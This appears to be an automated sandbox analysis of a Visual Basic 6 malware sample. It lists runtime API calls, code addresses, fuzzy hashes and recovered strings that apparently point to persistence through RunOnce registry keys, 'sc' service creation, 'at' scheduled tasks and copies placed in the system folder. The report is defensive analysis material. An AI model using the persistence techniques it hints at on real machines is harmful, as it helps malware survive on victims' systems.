__vbaSetSystemError.MSVBVM60(?,00000000,Function_000032B6), ref: 00422250
__vbaStrCat.MSVBVM60(00408794,?,00000000,?,00000000,Function_000032B6), ref: 0042226C
__vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 00422277
__vbaFreeStr.MSVBVM60(00000000,?,00000000,Function_000032B6), ref: 00422286
#598.MSVBVM60(?,00000000,Function_000032B6), ref: 00422293
#648.MSVBVM60(0000000A), ref: 004222B2
__vbaFreeVar.MSVBVM60 ref: 004222C1
__vbaStrCat.MSVBVM60(00408794,?), ref: 004222D7
__vbaFreeStr.MSVBVM60(004226E7), ref: 004226D7
__vbaFreeStr.MSVBVM60 ref: 004226E0

Strings

5, xrefs: 00422686

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
String ID: 5
API String ID: 3012955283-2226203566
Opcode ID: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
Instruction ID: 514902ae826528d268cef2b3f75eb0ca97d7031ef370423ce81c1c411bdef8a6
Opcode Fuzzy Hash: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
Instruction Fuzzy Hash: AD02D675900258EFDB04DFA0EE48BEEBB75FF48305F108169E502B72A0DBB45A45DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100, Relevance: 122.9, APIs: 65, Strings: 5, Instructions: 383COMMON

Download Yara Rule

APIs

#600.MSVBVM60(?,00000002), ref: 0040C111
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
__vbaFreeVar.MSVBVM60 ref: 0040C137
#580.MSVBVM60(00000000,00000027), ref: 0040CA1A
__vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
__vbaStrMove.MSVBVM60 ref: 0040CA3D
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
__vbaStrMove.MSVBVM60 ref: 0040CA62

Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7

__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
__vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
__vbaStrMove.MSVBVM60 ref: 0040CAA4
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
__vbaStrMove.MSVBVM60 ref: 0040CAC8
__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3

Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9

Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80

#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
__vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
__vbaStrMove.MSVBVM60 ref: 0040CB85
__vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
__vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
__vbaStrMove.MSVBVM60(?), ref: 0040CBF9
__vbaStrCopy.MSVBVM60 ref: 0040CC06
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
__vbaStrCopy.MSVBVM60 ref: 0040CC2E
__vbaStrMove.MSVBVM60(?), ref: 0040CC42
__vbaStrCopy.MSVBVM60 ref: 0040CC4F
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
__vbaStrCopy.MSVBVM60 ref: 0040CC77
__vbaStrMove.MSVBVM60(?), ref: 0040CC8B
__vbaStrCopy.MSVBVM60 ref: 0040CC98
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
__vbaStrCopy.MSVBVM60 ref: 0040CCC0
__vbaStrMove.MSVBVM60(?), ref: 0040CCD4

Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88

Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 00425A0A
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3

__vbaStrCopy.MSVBVM60 ref: 0040CCE1
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
__vbaStrCopy.MSVBVM60 ref: 0040CD09
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
__vbaStrMove.MSVBVM60 ref: 0040CD26

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
__vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
__vbaStrMove.MSVBVM60 ref: 0040CD4D
__vbaStrCopy.MSVBVM60 ref: 0040CD5A
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
__vbaStrCopy.MSVBVM60 ref: 0040CD8A
__vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
__vbaStrMove.MSVBVM60 ref: 0040CDA7

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
__vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
__vbaStrMove.MSVBVM60 ref: 0040CDCE
__vbaStrCopy.MSVBVM60 ref: 0040CDDB
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
__vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
__vbaStrMove.MSVBVM60 ref: 0040CE1A
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
__vbaStrMove.MSVBVM60 ref: 0040CE33
__vbaStrCopy.MSVBVM60 ref: 0040CE40
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
__vbaStrCopy.MSVBVM60 ref: 0040CE68

Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE

__vbaStrMove.MSVBVM60(?), ref: 0040CE7C
__vbaStrCopy.MSVBVM60 ref: 0040CE89
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99

Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8

__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
__vbaFreeObj.MSVBVM60 ref: 0040CF42
__vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
__vbaFreeStr.MSVBVM60 ref: 0040CFAA

Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,72A20EBE), ref: 00411B74
Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F

Strings

system\, xrefs: 0040CD16, 0040CD97
Once, xrefs: 0040CA52, 0040CAB8
at., xrefs: 0040CE0A
MR, xrefs: 0040CB75
RO, xrefs: 0040CA2D, 0040CA94

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$Error$Bstr$ChkstkUnlock$#516#580#631AnsiFileSystemUnicode$#525#570#648LockOpen$#529#537#600#616BoundsCheckDestructEraseGenerateGet3Get4HresultRedimSeek
String ID: MR$ RO$Once$at.$system\
API String ID: 2909355650-3550570743
Opcode ID: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
Instruction ID: 5352e845ad87aaf5050473855ece2fd4f397f64d24d7448873b9de5ca92ad3b4
Opcode Fuzzy Hash: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
Instruction Fuzzy Hash: E0F14F71A00248EFDB04EFA0EE89AEE7775EF48304F108169F606B72A1DB745A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB20, Relevance: 112.4, APIs: 61, Strings: 3, Instructions: 355COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041EB3E
__vbaOnError.MSVBVM60(00000001,?,?,?,00000000,Function_000032B6), ref: 0041EB6E
__vbaSetSystemError.MSVBVM60(00000005,00000000,00000002,?,?), ref: 0041EBB0
__vbaSetSystemError.MSVBVM60(00000040,00004000), ref: 0041EBE8
__vbaSetSystemError.MSVBVM60(?,FFFFFFFF,?,00004000), ref: 0041EC19
__vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0

Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
Part of subcall function 0041F150: __vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F20F
Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F218
Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,00000001), ref: 0041F22D
Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F238
Part of subcall function 0041F150: __vbaInStr.MSVBVM60(00000000,00000000), ref: 0041F241
Part of subcall function 0041F150: #616.MSVBVM60(?,-00000001), ref: 0041F251
Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F25C
Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60 ref: 0041F265
Part of subcall function 0041F150: __vbaFreeStr.MSVBVM60(0041F2A2), ref: 0041F29B

__vbaStrMove.MSVBVM60(?), ref: 0041ECBB
__vbaStrCmp.MSVBVM60(00408114,?), ref: 0041ECD1
__vbaStrCat.MSVBVM60(00000000,00409A70,?), ref: 0041ECF1
__vbaStrMove.MSVBVM60 ref: 0041ECFC
__vbaStrCmp.MSVBVM60(00000000), ref: 0041ED03
__vbaFreeStr.MSVBVM60 ref: 0041ED1E
__vbaStrCat.MSVBVM60(?,sc ), ref: 0041ED43
__vbaStrMove.MSVBVM60 ref: 0041ED4E
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041ED5C
#600.MSVBVM60(00000008,00000000), ref: 0041ED7B
__vbaFreeStr.MSVBVM60 ref: 0041ED8A
__vbaFreeVar.MSVBVM60 ref: 0041ED96
__vbaStrCat.MSVBVM60(?,sc ), ref: 0041EDAC
__vbaStrMove.MSVBVM60 ref: 0041EDB7
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EDC5
#600.MSVBVM60(00000008,00000000), ref: 0041EDE4
__vbaFreeStr.MSVBVM60 ref: 0041EDF3
__vbaFreeVar.MSVBVM60 ref: 0041EDFF

Part of subcall function 0041A980: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041A99E
Part of subcall function 0041A980: __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0041A9CE
Part of subcall function 0041A980: __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,00000000,?,00000000,Function_000032B6), ref: 0041A9DF
Part of subcall function 0041A980: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0041A9EE
Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0041AA0A
Part of subcall function 0041A980: __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041AA44
Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041AA5A
Part of subcall function 0041A980: __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041AA73
Part of subcall function 0041A980: #525.MSVBVM60(00000104), ref: 0041AA9C
Part of subcall function 0041A980: __vbaStrMove.MSVBVM60 ref: 0041AAA7
Part of subcall function 0041A980: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041AADE
Part of subcall function 0041A980: __vbaStrToAnsi.MSVBVM60(?,00000000,000001F4), ref: 0041AB38

__vbaSetSystemError.MSVBVM60(00000014,00000000), ref: 0041EE2B
#598.MSVBVM60 ref: 0041EE38
#611.MSVBVM60(00000000), ref: 0041EE47
#661.MSVBVM60(?,00407C78,00000000,40000000,00000008), ref: 0041EE77
#705.MSVBVM60(?,00000004), ref: 0041EE86
__vbaStrMove.MSVBVM60 ref: 0041EE94
__vbaStrCat.MSVBVM60(?,at ), ref: 0041EEB9
__vbaStrMove.MSVBVM60 ref: 0041EEC4
__vbaStrCat.MSVBVM60(004086A8,00000000), ref: 0041EED0
__vbaStrMove.MSVBVM60 ref: 0041EEDB
__vbaStrMove.MSVBVM60(00000000), ref: 0041EEEB
__vbaStrCat.MSVBVM60(00000000), ref: 0041EEF2
__vbaStrMove.MSVBVM60 ref: 0041EEFD
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF0A
__vbaStrMove.MSVBVM60 ref: 0041EF15
__vbaStrCat.MSVBVM60("\\,00000000), ref: 0041EF21
__vbaStrMove.MSVBVM60 ref: 0041EF2C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF3A
__vbaStrMove.MSVBVM60 ref: 0041EF45
__vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF51
__vbaStrMove.MSVBVM60 ref: 0041EF5C
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF6A
__vbaStrMove.MSVBVM60 ref: 0041EF78
__vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041EF84
__vbaStrMove.MSVBVM60 ref: 0041EF92
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 0041EF9F
__vbaStrMove.MSVBVM60 ref: 0041EFAD
__vbaStrCat.MSVBVM60(004095E4,00000000), ref: 0041EFB9
#600.MSVBVM60(00000008,00000000), ref: 0041EFD8
__vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041F022
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041F042
__vbaOnError.MSVBVM60(000000FF), ref: 0041F076
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041F099
__vbaSetSystemError.MSVBVM60(?), ref: 0041F0AF
__vbaExitProc.MSVBVM60 ref: 0041F0B5
__vbaFreeStr.MSVBVM60(0041F135), ref: 0041F12E

Strings

at , xrefs: 0041EEB0
sc , xrefs: 0041ED3A, 0041EDA3
"\\, xrefs: 0041EF1C

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Ansi$#600Chkstk$#537List$#525#598#606#611#616#661#705Construct2CopyExitProcUnicode
String ID: "\\$at $sc
API String ID: 318166071-2414866108
Opcode ID: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
Instruction ID: eba9ca47820d788d97438d3d91098e027868d298501ab0f7648888b7b33149ee
Opcode Fuzzy Hash: 4b8c8b84d047fe4784aaf450267804eaefad0624f37f806294de8aa0bbb905cd
Instruction Fuzzy Hash: 01F12E71900248EFDB14DFA0DE49BDEBBB4FB48305F1081AAE506B72A0DB745A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040502A, Relevance: 108.9, APIs: 55, Strings: 7, Instructions: 415COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040F89E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040F8E5

Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
